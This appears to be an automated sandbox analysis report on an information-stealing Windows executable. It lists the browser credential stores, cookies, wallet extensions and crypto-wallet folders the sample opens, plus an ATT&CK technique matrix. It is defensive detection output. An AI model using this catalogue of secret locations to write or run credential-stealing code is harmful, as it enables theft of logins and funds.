              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1775315216.0000000003090000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1872387463.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000002.1877490419.0000000003093000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000002.1875704776.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1873169366.0000000000A9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: Ag3ijL3z1w.exe PID: 7264, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1712285462.0000000000B27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "%appdata%\\Electrum\\wallets",
              Source: Ag3ijL3z1w.exe, 00000000.00000002.1877392777.0000000003070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Edge/Default/Extensions/Jaxx LibertyIEQ
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1712285462.0000000000B27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "m": ["app-store.json", ".finger-print.fp", "simple-storage.json", "window-state.json"],
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1712285462.0000000000B27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "%appdata%\\Exodus\\exodus.wallet",
              Source: Ag3ijL3z1w.exeString found in binary or memory: Edge/Default/Extensions/ExodusWeb3
              Source: Ag3ijL3z1w.exe, 00000000.00000002.1875055252.0000000000788000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: Wallets/BinanceC:\Users\user\AppData\Roaming\Binance
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1712285462.0000000000B27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "%appdata%\\Ethereum",
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1873169366.0000000000A93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Ag3ijL3z1w.exe, 00000000.00000003.1712285462.0000000000B27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "keystore"
              Source: Ag3ijL3z1w.exe, 00000000.00000002.1875055252.0000000000788000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Live+p2
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Roaming\Binance
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJ
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPS
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFL
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRH
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNN
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRH
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFL
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIX
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNN
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDI
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFL
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRH
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
              Source: C:\Users\user\Desktop\Ag3ijL3z1w.exeDirectory queried: number of queries: 1001
              Source: Yara matchFile source: Process Memory Space: Ag3ijL3z1w.exe PID: 7264, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: Ag3ijL3z1w.exe PID: 7264, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Virtualization/Sandbox Evasion
              1
              OS Credential Dumping
              131
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              21
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell
              Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
              Deobfuscate/Decode Files or Information
              LSASS Memory11
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol31
              Data from Local System
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
              Obfuscated Files or Information
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading
              NTDS2
              File and Directory Discovery
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets12
              System Information Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

